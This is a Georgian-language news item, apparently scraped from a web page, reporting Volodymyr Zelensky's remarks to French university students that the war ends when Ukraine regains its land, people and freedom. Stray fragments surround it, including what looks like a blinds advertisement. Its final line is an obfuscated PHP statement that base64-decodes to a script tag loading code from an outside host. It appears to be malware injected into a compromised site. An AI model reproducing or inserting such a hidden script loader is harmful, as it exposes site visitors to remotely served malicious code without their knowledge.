tube
ავერსი jaluzi
უკრაინის პრეზიდენტის ვოლოდიმირ ზელენსკის განცხადებით, რუსეთის მიერ დაწყებული ომი დასრულდება მაშინ, როდესაც უკრაინა დაიბრუნებს თავის ტერიტორიებს, ადამიანებს, მშვიდობას, თავისუფლებას და არჩევანის უფლებას. ამის შესახებ მან ფრანგული უნივერსიტეტების სტუდენტებთან ონლაინ შეხვედრისას განაცხადა.
 
მისი თქმით, უკრაინელებს სურთ დაიბრუნონ თავისი მიწა, ადამიანები, თავისუფლება და არჩევანის უფლება.
 
„უკრაინელი ხალხისთვის ომი დასრულდება მაშინ, როდესაც ჩვენ ჩვენსას დავიბრუნებთ. ეს სიმართლეა. ღიად ვამბობ: ჩვენ ზედმეტი არ გვჭირდება..გვსურს დავიბრუნოთ მშვიდობა ჩვენ სახელმწიფოში, ჩვენ მიწაზე.
 
რუსეთს თანმიმდევრობით მიჰქონდა ყველა ჩვენი უფლება: უფლება ჩვენ მიწაზე, არჩევანზე და საბოლოოდ მივედით სიცოცხლის უფლებამდეც. ჩვენ ახლა სიცოცხლისთვის ვიბრძვით სიცოცხლის დაკარგვით.
 
აუცილებელია რუსეთი დაჯდეს მოლაპრაკებათა მაგიდასთან და შეიგნოს სასჯელის გარდაუვალობა და მათი ნაბიჯების დიდი ცდომილება, რაც გამოიწვევს და უკვე მიგვიყვანს კატასტროფულ მომავალამდე მათი კულტურის, ცნობიერებისა და მათი სახელმწიფოსთვის, მაგრამ ეს მათი გადაწყვეტილება იყო" , - აღნიშნა ზელენსკიმ.
 
მისი თქმით, ეს უნდა იყოს სწორედ დიალოგი და არა ულტიმატუმი.
659
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");